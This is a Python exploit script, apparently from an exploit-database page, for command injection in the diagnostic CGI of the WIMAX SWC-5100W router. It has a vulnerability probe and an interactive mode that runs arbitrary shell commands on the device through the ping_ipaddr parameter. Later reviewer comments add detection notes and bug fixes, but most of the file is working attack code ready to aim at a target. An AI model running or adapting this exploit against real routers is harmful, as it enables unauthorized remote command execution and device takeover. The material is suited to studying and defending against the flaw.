## https://sploitus.com/exploit?id=PACKETSTORM:171748
# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE  
# Vulnerability Name: Ballin' Mada  
# Date: 4/3/2023  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main  
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)  
# Tested on: Unix  
# CVE : Under registration  
  
import requests  
import random,argparse  
import sys  
from colorama import Fore  
from bs4 import BeautifulSoup  
  
# Terminal colour shortcuts (colorama) used by the status messages below.
red, green, cyan, yellow, reset = (
    Fore.RED,
    Fore.GREEN,
    Fore.CYAN,
    Fore.YELLOW,
    Fore.RESET,
)

# Command-line interface: one optional target plus two mode switches.
# Nothing here validates the target value; it is later interpolated
# verbatim into the request URL.
argParser = argparse.ArgumentParser()
argParser.add_argument(
    "-t", "--target",
    help="Target router",
)
argParser.add_argument(
    "-rv", "--reverseShell",
    help="Obtain reverse shell",
    action='store_true',
)
argParser.add_argument(
    "-tx", "--testExploit",
    help="Test exploitability",
    action='store_true',
)

# Parsed once at import time; the functions below read these module globals.
args = argParser.parse_args()
target, rev, testX = args.target, args.reverseShell, args.testExploit
  
  
banner = """  
____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____   
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||  
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||  
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|  
RCE 0day in WIMAX SWC-5100W  
[ Spell the CGI as in Cyber Guy ]  
"""  
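def checkEXP():
    """Probe the target's diagnostic CGI and report whether it looks injectable.

    Sends one GET to ``/cgi-bin/diagnostic.cgi`` whose ``ping_ipaddr`` value
    carries a ``;`` followed by an ``echo`` of a marker string, then looks
    for that marker in the returned page.  On a hit, a second request asks
    the device to echo kernel, working-directory and user details inside an
    ``<a id='pwned'>`` element, and that element's text is printed.

    Reads the module-level ``target`` and colour constants, returns ``None``
    and reports everything through ``print``.

    Defender notes: both requests are plain-HTTP GETs, so the injected value
    sits in the query string; access logs or an IDS rule matching ``;`` or
    backticks in ``ping_ipaddr`` will surface this probe.  The device-side
    remedy is presumably to accept only a literal IP address in that field
    and never pass it to a shell (the CGI source is not shown on this page;
    confirm against the firmware).
    """
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    # Choose the marker once so the response is checked for the string that
    # was actually sent.  The previous condition
    # (`find(A) < 0 or find(B)`) was true whenever marker A was absent, or
    # marker B was anywhere except offset 0 (including not found at all),
    # so almost every HTTP 200 response was reported as vulnerable.
    marker = random.choice(art)
    # NOTE(review): the page header labels the issue "Authenticated", yet no
    # credentials or session cookie are attached to this request.  The page
    # does not show whether the endpoint enforces authentication; confirm
    # before using the label for severity triage.
    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+marker+")';", proxies=None)
    if request.status_code != 200:
        print(red + "[+] Status code: " + str(request.status_code) + reset)
        return
    print(green + "[+] Status code: 200 success" + reset)

    page_text = BeautifulSoup(request.text, 'html.parser').get_text(" ")
    # A page that merely reflects the submitted parameter would also contain
    # the marker, so a hit is an indicator to verify, not proof of execution.
    if marker not in page_text:
        print(red + "[+] Seems to be not vulnerable" + reset)
        return
    print(green + "[+] Target is vulnerable" + reset)

    uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")
    soup_validate = BeautifulSoup(uname.text, 'html.parser')
    pwned = soup_validate.find(id="pwned")
    # find() returns None when the element is missing; report that instead
    # of crashing with AttributeError on `.text`.
    if pwned is None:
        print(red + "[-] Marker was found but the follow-up output element was not returned" + reset)
        return
    print(pwned.text)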
  
  
def revShell():
    """Prompt for a command, relay it through the diagnostic CGI, print the reply.

    Despite the name, no reverse connection is opened: each command is
    wrapped in backticks inside the ``ping_ipaddr`` query parameter of a
    separate HTTP GET, and the output is read back from the
    ``<a id='result'>`` element of the response.  The function then calls
    itself to prompt again.  An empty line ends the session; ``exit`` or
    ``quit`` end it too, but only after that word has itself been sent to
    the device like any other command.

    Reads the module-level ``target``.  The command text is placed in the
    URL as typed, with no encoding applied.

    Defender notes: every command produces one GET to
    ``/cgi-bin/diagnostic.cgi`` with ``;`` and backticks in
    ``ping_ipaddr``, so a session appears as a burst of such requests in
    the device's or an upstream proxy's access log.
    """
    command = input("CGI #:- ")
    if not command:
        # Blank input: nothing to send, leave the session.
        return None
    try:
        print(command)
        reply = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{command}`</a>\";")
        parsed = BeautifulSoup(reply.text, 'html.parser')
        # NOTE(review): find() yields None when the element is absent, in
        # which case `.text` raises AttributeError and the session aborts.
        print(parsed.find(id="result").text)
        if command in ("exit", "quit"):
            print(yellow + "[*] Terminating ..." + reset)
            sys.exit(0)
        # Recurse for the next prompt; the nested input() call runs inside
        # this try block, so Ctrl-C at later prompts is caught below.
        return revShell()
    except KeyboardInterrupt:
        sys.exit(0)
  
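def help():
    """Print a short usage summary of the script's command-line options.

    The text previously advertised a ``-fz/--fuzz`` switch, but the argument
    parser in this file defines only ``-t``, ``-rv`` and ``-tx``; the stale
    line is dropped so the summary matches what the parser accepts.

    NOTE(review): this function shadows the built-in ``help`` and is not
    called anywhere in the visible file; the fallback path uses
    ``argParser.print_help()`` instead.
    """
    print(
        """   
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv  
  
[*] -t, --target :: Specify target to attack.  
[*] -rv, --reverseShell :: Obtain reverse shell.  
[*] -tx, --testExploit :: Test the exploitability of the target.  
"""
    )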
  
# Entry-point dispatch.  The banner is shown on every path, so print it once.
print(banner)
if not target:
    # No target supplied: nothing can run, show the parser's usage text.
    argParser.print_help()
elif rev:
    # -rv takes precedence when both mode switches are given.
    revShell()
elif testX:
    checkEXP()
else:
    # Target given without a mode switch.
    argParser.print_help()